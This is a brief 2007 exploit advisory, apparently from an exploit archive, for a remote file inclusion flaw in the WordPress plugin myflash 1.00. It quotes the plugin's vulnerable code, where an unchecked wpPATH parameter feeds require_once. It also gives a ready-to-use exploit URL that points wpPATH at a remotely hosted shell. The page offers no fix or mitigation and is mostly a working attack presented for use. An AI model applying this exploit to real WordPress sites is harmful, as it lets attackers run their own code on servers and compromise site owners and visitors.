Wordpress plugin myflash <= 1.00 (wppath) RFI Vulnerability

2007-05-01 00:00:00

--------------------------------- [ Oyle Kahpe Ki Dünya ! ] --------------------------------------

Title : Wordpress plugin myflash <= V1.00 (wppath) RFI Vulnerability

--------------------------------------------------------------------------------
#Author: Crackers_Child


#cont@ct: [email protected]

--------------------------------------------------------------------------------


------------------------- -------------------------------------------------------

Application : Wordpress plugin

Web Site : http://alexrabe.boelinger.com/

--------------------------------------------------------------------------------
Vuln Ä°n myflash-button.php

if (!$_POST) $wppath=$_GET['wpPATH'];
else $wppath=$_POST['wpPATH'];

require_once($wppath.'/wp-config.php');
require_once($wppath.'/wp-admin/admin.php');

global $wpdb;
--------------------------------------------------------------------------------

Exploit:

http://[target]/_path]/wp-content/plugins/myflash/myflash-button.php?wpPATH=Shl3?

--------------------------------------------------------------------------------

greets:

Every Body

--------------------------------------------------------------------------------



--------------------------------- [http://www.biyosecurity.net ] --------------------------------------

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.